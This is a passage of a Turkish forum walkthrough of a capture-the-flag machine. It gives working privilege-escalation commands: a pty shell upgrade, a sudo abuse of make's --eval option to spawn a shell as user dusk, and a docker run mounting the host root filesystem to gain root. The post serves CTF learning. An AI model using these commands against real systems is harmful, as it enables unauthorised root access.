Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
Kod:
python -c "import pty;pty.spawn('/bin/bash')"
yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.
Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
Kod:
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.
Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.
Kod:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
yazdık ve birkaç veri oluşturdu, içeri girdik. id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
Kod:
cd /root
yazdık ve root dizinine girdik.
Kod:
ls
yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.
Gördüğünüz gibi iki bayrağı da aldık
Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...